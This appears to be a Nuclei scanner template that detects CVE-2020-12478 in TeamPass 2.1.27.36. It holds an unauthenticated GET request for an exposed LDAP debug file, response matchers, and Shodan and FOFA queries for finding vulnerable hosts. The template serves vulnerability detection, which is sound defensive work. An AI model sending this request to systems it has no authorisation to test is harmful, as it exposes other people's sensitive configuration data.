56 lines
1.9 KiB
YAML
56 lines
1.9 KiB
YAML
id: CVE-2020-12478
|
|
|
|
info:
|
|
name: TeamPass 2.1.27.36 - Improper Authentication
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
|
impact: |
|
|
An attacker can bypass authentication and gain unauthorized access to sensitive information.
|
|
remediation: |
|
|
Upgrade to a patched version of TeamPass or apply the recommended security patches.
|
|
reference:
|
|
- https://github.com/nilsteampassnet/TeamPass/issues/2764
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
- https://github.com/StarCrossPortal/scalpel
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-12478
|
|
cwe-id: CWE-306
|
|
epss-score: 0.01338
|
|
epss-percentile: 0.86048
|
|
cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: teampass
|
|
product: teampass
|
|
shodan-query: http.html:"teampass"
|
|
fofa-query: body="teampass"
|
|
tags: cve2020,cve,teampass,exposure,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/files/ldap.debug.txt"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Get all LDAP params'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/plain"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402203c3ed4c33c607da7e95a503d9f74d3faa7e79e2803afc11350dc9302994de26c0220286df5517488e25a05d7072e07a17a439242b6ac2f012cc35d48207d473d3676:922c64590222798bb761d5b6d8e72950 |